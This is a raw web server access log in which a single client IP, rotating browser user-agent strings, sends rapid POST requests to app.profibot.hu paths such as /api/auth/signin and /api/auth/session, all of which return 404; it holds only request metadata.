"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:57 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/posts" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:58 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/de" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu 